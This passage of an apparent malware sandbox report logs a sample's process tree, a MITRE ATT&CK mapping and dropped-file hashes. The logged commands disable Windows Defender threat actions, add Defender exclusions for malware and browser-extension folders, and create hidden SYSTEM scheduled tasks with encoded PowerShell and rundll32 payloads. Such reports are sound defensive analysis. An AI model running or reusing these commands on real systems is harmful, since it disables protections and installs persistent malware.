    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3612
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HyPszsbozHjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HyPszsbozHjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YdicROZXU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YdicROZXU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\czlHcasKUAUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\czlHcasKUAUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sdIWsxsIljAmC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sdIWsxsIljAmC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WmDfgxqULrgOkJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WmDfgxqULrgOkJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pwHRhheBOrJCKgILh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pwHRhheBOrJCKgILh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WfWMfMBmpceHOoPp\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WfWMfMBmpceHOoPp\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1048
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HyPszsbozHjU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HyPszsbozHjU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdicROZXU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdicROZXU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\czlHcasKUAUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\czlHcasKUAUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdIWsxsIljAmC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdIWsxsIljAmC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WmDfgxqULrgOkJVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WmDfgxqULrgOkJVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pwHRhheBOrJCKgILh /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pwHRhheBOrJCKgILh /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WfWMfMBmpceHOoPp /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WfWMfMBmpceHOoPp /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2980
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gPsUgGJOe" /SC once /ST 00:41:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2804
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gPsUgGJOe"
  2⤵
  PID:1556
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gPsUgGJOe"
  2⤵
  PID:3076
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "IHVYqsxcTONNTHrkf"
  2⤵
  PID:2004
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "IHVYqsxcTONNTHrkf"
  2⤵
  PID:372
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "IHVYqsxcTONNTHrkf2"
  2⤵
  PID:4552
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "IHVYqsxcTONNTHrkf2"
  2⤵
  PID:620
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FHGmkIleNxhXYqnGE"
  2⤵
  PID:3640
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FHGmkIleNxhXYqnGE"
  2⤵
  PID:3812
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FHGmkIleNxhXYqnGE2"
  2⤵
  PID:4000
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FHGmkIleNxhXYqnGE2"
  2⤵
  PID:4784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "qAeAPTrMJRoznGvjNRa"
  2⤵
  PID:564
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "qAeAPTrMJRoznGvjNRa"
  2⤵
  PID:3328
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "qAeAPTrMJRoznGvjNRa2"
  2⤵
  PID:872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "qAeAPTrMJRoznGvjNRa2"
  2⤵
  PID:5000
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "uEYSTijKezSiwZHRVZv"
  2⤵
  PID:1536
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "uEYSTijKezSiwZHRVZv"
  2⤵
  PID:456
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "uEYSTijKezSiwZHRVZv2"
  2⤵
  PID:1056
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "uEYSTijKezSiwZHRVZv2"
  2⤵
  PID:4764
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YdicROZXU\DwYzER.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NZVNOJbpXMfOcZM" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:4540
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "RfJdocXrRdzqSjl"
  2⤵
  PID:2568
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "RfJdocXrRdzqSjl"
  2⤵
  PID:1436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "RfJdocXrRdzqSjl2"
  2⤵
  PID:892
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "RfJdocXrRdzqSjl2"
  2⤵
  PID:3720
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "hyUxRErQvVmnlS"
  2⤵
  PID:4036
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "hyUxRErQvVmnlS"
  2⤵
  PID:2684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "tvNRMRhykyYTT"
  2⤵
  PID:1576
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "tvNRMRhykyYTT"
  2⤵
  PID:4484
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "tvNRMRhykyYTT2"
  2⤵
  PID:880
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "tvNRMRhykyYTT2"
  2⤵
  PID:3304
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "NZVNOJbpXMfOcZM2" /F /xml "C:\Program Files (x86)\YdicROZXU\amFLffJ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5000
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "NZVNOJbpXMfOcZM"
  2⤵
  PID:3548
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "NZVNOJbpXMfOcZM"
  2⤵
  PID:4804
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "lwldEwWqrgILqr" /F /xml "C:\Program Files (x86)\HyPszsbozHjU2\ARvCxIX.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2692
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "AAxajbpKnHWKP2" /F /xml "C:\ProgramData\WmDfgxqULrgOkJVB\YAywBBn.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:988
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FHGmkIleNxhXYqnGE2" /F /xml "C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\hFAPIao.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2860
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "uEYSTijKezSiwZHRVZv2" /F /xml "C:\Program Files (x86)\sdIWsxsIljAmC\kdvVksb.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4848
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 628
  2⤵
  - Program crash
  PID:2232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4988
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:3132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4504

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4116 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
1⤵
PID:2268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4844 -ip 4844
1⤵
PID:1160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\hFAPIao.xml

Filesize
2KB

MD5
f406d38f1e380dff23f6207f30fc529d

SHA1
d3380c5cf780650816ffe9a1b268351f30586b7d

SHA256
b2a9439110bd69f40cadc3000d0da7021a67d92c634315f5495a7de65911996c

SHA512
2ebc7937e2fbb7d44a066fb81efe3f01a6abbbbce52a2b67fde1665242432ed8786af14ff2884f3e48612d819ff4bb133372d1efe1cef424ca801988e83afbb5

Download Submit
C:\Program Files (x86)\HyPszsbozHjU2\ARvCxIX.xml

Filesize
2KB

MD5
f826a467ef918a9c94d9ce7051203a79

SHA1
f7dc15f8e34a8594e6b0d5bf46c0ce797e151a47

SHA256
1ff8d8ff436c29a6b3ee4930c074d1892f951a672b5b5a5f3f5a0c4bb4eeec55

SHA512
3b86749e6a31e0cd05f73094fd548b60619f798a7fdc645aee234bc45ffa72c151268f02e07f3fd069ff3f4162a2b945c5cd13aeb250f1022f66943d6e45adae

Download Submit
C:\Program Files (x86)\YdicROZXU\amFLffJ.xml

Filesize
2KB

MD5
e5dd2c69ee2c7c74d057ab20bee6053d

SHA1
189abe24528a862c450d2c88c00da2f2bd05c99e

SHA256
d67effbef8cb1f768a1a4257cf70bf58bb35d4596f9eb935f520f564cf4ca41a

SHA512
14a786040b6fbf4bc9b72ad0ff788c280569ffa4967a4da511cb33c4d5819b2f7d2a8e006d2fbf035114d96b0c21be610fec150a9119c8822e3363f8a7b4873c

Download Submit
C:\Program Files (x86)\sdIWsxsIljAmC\kdvVksb.xml

Filesize
2KB

MD5
39f9291003055438fe7f05c4c1e2c152

SHA1
a79c7d4d31236fa57536846baaeb9fc1212c236f

SHA256
e3d3d97cd81172e7fc71fd81b2db801b4eaaa1beaa8129589804b5e0b0f8b468

SHA512
7c8efd88480b3ac7e7eace4b5e270e0fa663074a325af64626f45718e15a1709c1e649254788a2cbd91f9096e3e702c27d080926860d917a62c487a90593ce91

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{EF7EF554-D23D-4BD5-A178-25C4A3726B49}.xpi

Filesize
640KB

MD5
b72f5413456581edd4a9d7cdf989419b

SHA1
b5fbdf99f427e906ba02eea13c9a521a068fe4f9

SHA256
bf601441b3f7621b442f527854f1a91dc7bc1116e2d3eee4c15d5212c6a52b33

SHA512
f5b7b218ffb8e4a2f7ad36808efe74030d8d9c29ad4688977eb368c67b0d909957f2bb38611b3a892e54aae4556b1ea86effa47575209f8c89b99cfd0a46c1a7

Download Submit
C:\ProgramData\WmDfgxqULrgOkJVB\YAywBBn.xml

Filesize
2KB

MD5
a474e1504e54f4d0afca0965ec17824f

SHA1
8d0b94d6ea14dc099b0b7c0cf6037f39fe0a678c

SHA256
6ce2f950349332324f63e8d7a4e2a334ae6d15bc1987e06cfc40ee100a7aec17

SHA512
5fd2eb9759e7e01f88f03c1850abaacb1580fed91faa730331308e4d73233eaf2808b7d56533262653ebefe508a85d3de076cd7c3ae2c19e37fb8ff916d31815

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnknkapchbklfgbfimfgcapmdnlkdajg\1.2_0\_locales\en\messages.json

Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnknkapchbklfgbfimfgcapmdnlkdajg\1.2_0\_locales\pt_BR\messages.json

Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\cfppnjkmonaidnemfamopfflbcnecfco\9.2.4_0\_locales\es\messages.json

Filesize
186B

MD5
a14d4b287e82b0c724252d7060b6d9e9

SHA1
da9d3da2df385d48f607445803f5817f635cc52d

SHA256
1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152

SHA512
1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
ef279f31f77485d3362a13663475bcdd

SHA1
e19a25f04b3b31c3824e6ef4d761843d2500a4ed

SHA256
2cd593a124a756bc2705a14e6fb657781169f86ed00659b1fc6ec380aa5bebbf

SHA512
4ce35d9d91561e0f8a03b2e45a213c60769784746535a25937de6380bafa9fdb0534bcc97dd926198497bd4b3c93f8461e4af83e23b43efcddbc3822f60195fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
493d018927afac4b688133f1ed042679

SHA1
e291f5082e1b725d785425264b89b2d1b843ebac

SHA256
bce185ff763e01b1d29876bcb83814f5b022c6a0d2ad39508c32534d9f1552dd

SHA512
ee4889b4eadea90d8cd2ec2885ce67a475f74ba4e744b3d12346ce2e9e8f7ce2b9a6a5fc49f03a021067a6dc37e2ae5c108695e4878d4429d0effd40fbac9084

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jd0df4tb.gz5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js

Filesize
6KB

MD5
c2d03b4b612c17955d57126d65d05cb7

SHA1
8fbe3f4af0c925a0df1cfe57560631042a08d1c0

SHA256
a601d9bab480095f5e845a6d30eaf8f6c600b95168ec86dcb99ec1d0ef97d0c7

SHA512
d485a09e143d40c60443c05184ed6e407eda948670ec90c58e8886429b71c7c212da2872faf7ef23fbe357480f94cc313179e4d489e10889a4dcc4292050f396

Download Submit
C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Filesize
7KB

MD5
2bc6f7b327247a05a35a28c0bf3ffce0

SHA1
15b4009e3021b3041a59502f2e980a21ddaf3e3e

SHA256
980f3908cb71250243d3574bc4db8b4cb3eed687f82c17afeb0c1c2fde3e13fc

SHA512
a6ec30e8e213aa60dc45b9fed9580812b88cf11e26356c06bac63927cbd7d75a83bfb1f33e2d6f162bd8f38ef376675f362083d94c3e374c6508a9eb565baf91

Download Submit
